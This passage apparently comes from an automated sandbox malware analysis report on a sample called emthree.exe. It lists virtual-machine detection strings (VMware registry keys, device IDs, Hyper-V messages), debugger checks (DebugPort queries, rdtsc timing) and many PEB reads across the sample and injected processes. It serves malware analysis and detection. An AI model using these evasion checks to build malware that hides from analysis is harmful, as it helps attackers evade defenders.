          Source: explorer.exe, 00000002.00000000.260477578.000000000891C000.00000004.00000001.sdmp | Binary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 00000002.00000002.494634416.0000000003710000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000002.00000000.258991839.0000000008270000.00000002.00000001.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: emthree.exe, 00000000.00000002.240074394.000000000387D000.00000004.00000001.sdmp | Binary or memory string: vmware
          Source: emthree.exe, 00000000.00000002.240074394.000000000387D000.00000004.00000001.sdmp | Binary or memory string: l%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: emthree.exe, 00000000.00000002.240074394.000000000387D000.00000004.00000001.sdmp | Binary or memory string: VMWARE
          Source: explorer.exe, 00000002.00000000.241832967.00000000011B3000.00000004.00000020.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
          Source: emthree.exe, 00000000.00000002.239603549.0000000003530000.00000004.00000001.sdmp | Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000002.00000000.260992522.00000000089B5000.00000004.00000001.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
          Source: explorer.exe, 00000002.00000000.253126007.00000000053C4000.00000004.00000001.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
          Source: explorer.exe, 00000002.00000000.258991839.0000000008270000.00000002.00000001.sdmp | Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000002.00000000.258991839.0000000008270000.00000002.00000001.sdmp | Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000002.00000000.260992522.00000000089B5000.00000004.00000001.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
          Source: emthree.exe, 00000000.00000002.239603549.0000000003530000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
          Source: emthree.exe, 00000000.00000002.239603549.0000000003530000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
          Source: emthree.exe, 00000000.00000002.240074394.000000000387D000.00000004.00000001.sdmpBinary or memory string: VMware
          Source: emthree.exe, 00000000.00000002.239603549.0000000003530000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
          Source: emthree.exe, 00000000.00000002.240074394.000000000387D000.00000004.00000001.sdmpBinary or memory string: l"SOFTWARE\VMware, Inc.\VMware Tools
          Source: explorer.exe, 00000002.00000000.258991839.0000000008270000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\emthree.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\emthree.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00409A90 rdtsc
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0040ACD0 LdrLoadDll,
          Source: C:\Users\user\Desktop\emthree.exe Code function: 1_2_00FE58EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exe Code function: 1_2_00FE40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exe Code function: 1_2_01004120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exe Code function: 1_2_01004120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exe Code function: 1_2_0101513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exe Code function: 1_2_0100B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exe Code function: 1_2_00FE9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exe Code function: 1_2_0100C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exe Code function: 1_2_0101A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exe Code function: 1_2_01012990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exe Code function: 1_2_010669A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exe Code function: 1_2_010161A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exe Code function: 1_2_010A49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exe Code function: 1_2_010651BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exe Code function: 1_2_010099BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exe Code function: 1_2_010099BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exe Code function: 1_2_010099BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exe Code function: 1_2_010099BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exe Code function: 1_2_010099BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exe Code function: 1_2_010099BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exe Code function: 1_2_010099BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exe Code function: 1_2_010099BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exe Code function: 1_2_00FFB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exe Code function: 1_2_010741E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exe Code function: 1_2_01067016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exe Code function: 1_2_010B4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exe Code function: 1_2_00FEB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exe Code function: 1_2_0101002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exe Code function: 1_2_0100A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exe Code function: 1_2_01000050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exe Code function: 1_2_010A2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exe Code function: 1_2_010B1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exe Code function: 1_2_01063884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exe Code function: 1_2_00FEB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exe Code function: 1_2_00FEC962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exe Code function: 1_2_010120A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exe Code function: 1_2_010290AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exe Code function: 1_2_0101F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exe Code function: 1_2_0101F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exe Code function: 1_2_0107B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exe Code function: 1_2_0107B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exe Code function: 1_2_0107B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exe Code function: 1_2_0100B8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exe Code function: 1_2_00FE9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exe Code function: 1_2_0100A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exe Code function: 1_2_010A131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exe Code function: 1_2_00FFAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exe Code function: 1_2_010B8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exe Code function: 1_2_00FE52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exe Code function: 1_2_01013B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exe Code function: 1_2_010A138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exe Code function: 1_2_0109D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exe Code function: 1_2_0101B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exe Code function: 1_2_01012397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exe Code function: 1_2_01014BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exe Code function: 1_2_010B5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exe Code function: 1_2_00FE9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exe Code function: 1_2_010653CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exe Code function: 1_2_010103E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exe Code function: 1_2_00FEAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exe Code function: 1_2_0100DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exe Code function: 1_2_010923E3 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exe Code function: 1_2_010923E3 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exe Code function: 1_2_00FE5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exe Code function: 1_2_00FE5210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exe Code function: 1_2_00FE5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exe Code function: 1_2_00FF8A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exe Code function: 1_2_01003A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exe Code function: 1_2_010AAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exe Code function: 1_2_0100A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exe Code function: 1_2_01024A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exe Code function: 1_2_01074257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exe Code function: 1_2_010AEA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exe Code function: 1_2_0109B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exe Code function: 1_2_010B8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exe Code function: 1_2_00FF1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exe Code function: 1_2_0102927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exe Code function: 1_2_0101D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exe Code function: 1_2_00FEDB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exe Code function: 1_2_00FEF358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exe Code function: 1_2_0101FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exe Code function: 1_2_00FEDB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exe Code function: 1_2_01012ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exe Code function: 1_2_01012AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exe Code function: 1_2_010A4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exe Code function: 1_2_0106A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exe Code function: 1_2_010AE539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exe Code function: 1_2_01014D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exe Code function: 1_2_010B8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exe Code function: 1_2_01023D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exe Code function: 1_2_01063540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exe Code function: 1_2_01093D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exe Code function: 1_2_01007D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exe Code function: 1_2_00FF849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exe Code function: 1_2_0100C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exe Code function: 1_2_01012581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exe Code function: 1_2_0101FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exe Code function: 1_2_010135A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exe Code function: 1_2_010B05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exe Code function: 1_2_01011DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exe Code function: 1_2_01066DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exe Code function: 1_2_01066DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exe Code function: 1_2_01066DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exe Code function: 1_2_010AFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exe Code function: 1_2_01098DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exe Code function: 1_2_010B740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exe Code function: 1_2_010A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exe Code function: 1_2_01066C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exe Code function: 1_2_00FFD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exe Code function: 1_2_0101BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exe Code function: 1_2_0101A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exe Code function: 1_2_0107C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exe Code function: 1_2_0100746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exe Code function: 1_2_00FE2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exe Code function: 1_2_0101AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0101AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0101AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0101AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0101AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0101AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0101AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0101AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0101AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0101AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0101AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010A4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010A4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010A4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010A4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010A4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010A4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010A4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010A4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010A4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010A4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010A4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010A4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010A4496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FF3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FF3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FF3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FF3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FF3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FF3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FF3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FF3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FF3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FF3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FF3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FF3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FF3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FEAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010B8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010A14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_01066CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_01066CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_01066CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010B070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010B070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0101A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0101A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0100F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0107FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0107FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FF76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0101E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0100B73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0100B73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010B8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FF766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_01067794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_01067794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_01067794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FF7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FF7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FF7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FF7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FF7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FF7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FEE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010237F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FEC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FEC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FEC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_01018E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010A1608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0101A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0101A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0109FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010AAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010AAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FF8794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0100AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0100AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0100AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0100AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0100AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0107FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FFFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010646A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010B0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010B0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010B0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FFEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_01028EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0109FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010136CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FE4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FE4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010B8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010116E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F26CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F26CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F26CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F614FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F78CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F64496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F64496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F64496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F64496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F64496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F64496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F64496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F64496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F64496 mov eax, dword ptr fs:[00000030h]
